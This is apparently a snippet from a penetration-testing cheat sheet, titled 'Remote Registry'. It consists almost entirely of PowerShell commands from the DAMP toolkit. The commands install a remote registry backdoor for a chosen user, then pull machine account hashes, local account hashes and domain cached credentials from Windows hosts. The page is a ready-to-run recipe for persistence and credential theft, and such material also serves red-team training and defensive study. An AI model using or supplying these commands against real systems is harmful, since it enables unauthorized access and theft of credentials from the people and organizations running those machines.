5️⃣Remote Registry
Using the DAMP toolkit
. ./Add-RemoteRegBackdoor
. ./RemoteHashRetrievalUsing DAMP with admin privs on the remote machine
Add-RemoteRegBackdoor -Computername <computername> -Trustee <username> -VerboseRetrieve the machine account hash from the local machine
Get-RemoteMachineAccountHash -Computername <computername> -VerboseRetrieve the local account hash from the local machine
Get-RemoteLocalAccountHash -Computername <computername> -VerboseRetrieve domain cached credentials from the local machine
Get-RemoteCachedCredential -Computername <computername> -VerboseLast updated
Was this helpful?